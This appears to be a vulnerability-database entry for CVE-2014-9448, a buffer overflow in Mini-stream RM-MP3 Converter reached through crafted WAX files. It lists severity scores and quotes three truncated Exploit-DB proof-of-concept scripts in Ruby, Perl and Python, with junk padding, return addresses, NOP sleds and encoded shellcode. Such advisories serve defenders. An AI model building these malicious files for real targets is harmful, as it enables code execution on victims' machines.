CVE-2014-9448
Published 2015-01-02
Priority: P3 · 45 · high · 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 6.30% (92.7th percentile)
Buffer overflow in Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 allows remote attackers to execute arbitrary code or cause a denial of service (crash) via a long string in a WAX file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mini-stream | rm-mp3_converter | — | — |
No detection rules found.
Exploit-DB
Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' Local Buffer Overflow (SEH)
exploitdb·2014-11-26
---
#!/usr/bin/env ruby
# Exploit Title: Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 (.wax) SEH Buffer Overflow
# Date: 26.11.2014
# Exploit Author: Muhamad Fadzil Ramli
# Vendor Homepage: not valid anymore
# Software Link: not available
# Version: 3.1.2.1.2010.03.30
# Discovery: ZoRLu / [email protected]
# Tested on: Microsoft Windows XP [Version 5.1.2600]
filename = "3-1-2-1-gb.wax"
seh = 43501
buff = "\x41" * 45000
nops = "\x90" * 16
# ./msfvenom -p windows/exec CMD=calc EXITFUNC=thread -b "\x00\x0a\x0d\x0c\x20" -e x86/shikata_ga_nai -f ruby
sc =
"\xbe\x97\xd4\x64\xe7\xda\xdf\xd9\x74\x24\xf4\x5a\x33\xc9" +
"\xb1\x32\x83\xc2\x04\x31\x72\x0e\x03\xe5\xda\x86\x12\xf5" +
"\x0b\xcf\xdd\x05\xcc\xb0\x
Exploit-DB
Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' File Buffer Overflow (Denial of Service) (PoC) EIP Overwrite
exploitdb·2014-10-29
---
#EDB Note: DoS - b0f isn't working.
# Title : Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 (.wax) Buffer Overflow
# Author : ZoRLu / [email protected] / [email protected]
# Home : http://milw00rm.com / its online
# Date : 28.10.2014
# Python : V 2.7
# Thks : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others
my $file = "exploit.wax"; #dont change file name if change file name you must change $filepath
my $junk = "\x41" x 43516;
my $eip = "\xC3\x9c\xC8\x75"; #75C89CC3 JMP ESP | bad char: \x09\x0a
my $oyala = "\x90" x 100;
#tested on my windows 7 ultimate for file name "exploit.wax" if its not true path your windows you can change
Exploit-DB
Mini-stream RM-MP3 Converter 3.1.2.2 - Local Buffer Overflow
exploitdb·2012-04-09
---
# Exploit Title : Mini-stream RM-MP3 Converter V 3.1.2.2 Local Buffer OverFlow
# Author : [SkY-NeT SySteMs]
# Software Link : [http://mini-stream.net/rm-to-mp3-converter/download/]
# Version : [3.1.2.2]
# Tested on : [Xp Sp 2]
# Category : Local
# Code : Python
# Email : [[email protected]]
# WebSite : [http://sskynetsystems.blogspot.com/]
# !/usr/bin/python
import os,sys
header= "http://."
junk= "\x41" * 17416 # [A]
ESP = "\x13\x44\x87\x7C" # 7C874413 FFE4 JMP ESP
NOPS = "\x90" * 16
ShellCode =(
"\x2b\xc9\x83\xe9\xce\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76"
"\x0e\xa8\x6e\x77\xce\x83\xee\xfc\xe2\xf4\x54\x86\xfe\xce"
"\xa8\x6e\x17\x47\x4d\x5f\xa5\xaa\x23\x3c\x47\x45\xfa\x62"
"\xfc\x9c\xbc\xe5\x05\xe6\xa7\xd9\x3d
No writeups or analysis indexed.
Published: 2015-01-02